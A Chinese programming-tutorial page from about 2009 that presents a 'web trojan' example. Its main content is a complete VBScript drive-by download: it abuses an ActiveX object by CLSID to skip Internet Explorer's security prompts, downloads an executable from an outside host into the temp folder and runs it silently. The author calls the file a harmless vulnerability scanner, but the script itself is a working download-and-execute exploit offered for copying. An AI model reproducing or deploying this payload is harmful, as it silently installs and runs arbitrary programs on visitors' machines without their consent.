当前位置: 首页 > 图文教程 > 网络编程 > ASP > 网页木马代码例子(里面的文件是漏洞扫描器,呵呵)

ASP
对连串英文自动换行的解决方法 IE5.5
怎样写你自己的EMAIL组件(原理)
ASP中有关timeout超时的体会
用ASP实现从SQL Server导出数据到Access
ASP向NT域中加一个用户
ASP乱码的解决方法
关于 aspsmartupload 注册问题
利用XML不离开页面刷新数据
IIS 处理 SEARCH 请求漏洞
不用组件实现上载功能(1)
不用组件实现上载功能(2)
在网页中实现OICQ里的头像选择的下拉框
仅用xsl和asp实现分页功能
如何使用context()方法将数据置入表格(XML)
利用ASP从远程服务器上接收XML数据
将数据库里面的内容生成EXCEL
怎样在ASP里面创建统计图表
加密你的Access数据库
利用global.asp定时执行ASP
加密QueryString数据

ASP 中的 网页木马代码例子(里面的文件是漏洞扫描器,呵呵)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 108 ::
收藏到网摘: n/a

对于经常上网冲浪的朋友对于网页木马一定不会陌生,打开某个网站,莫名其妙的运行了某个木马,虽然在"Internet选项"里有"安全"设置,但是下面的代码就不会弹出任何信息就直接运行了程序,不信,follow me!
(提示: 只是了解一下技术和方法,千万别搞破坏,yexj00.exe是一个windows2000 漏洞扫描器和查漏补缺用的,不是病毒或木马,放心运行。)
复制代码 代码如下:

<script language="VBScript">
on error resume next
dl = "<a href="http://yexj00.5dm.cn/soft/yexj00.exe" target="_blank">http://yexj00.5dm.cn/soft/yexj00.exe</a>"
set ye=document.createElement("object")
yStr="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
ye.setAttribute "classid",yStr
Set x = ye.CreateObject("Microsoft.XMLHTTP","")
set S = ye.createobject("ADODB.Stream","")
S.type = 1
x.Open "GET", dl, False
x.Send
fname="win2000漏洞扫描器.exe"
set F = ye.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname= F.BuildPath(tmp,fname)
S.open
S.write x.responseBody
S.savetofile fname,2
S.close
set A=ye.createobject("Shell.Application","")
A.ShellExecute fname,"","", "open",1
</script>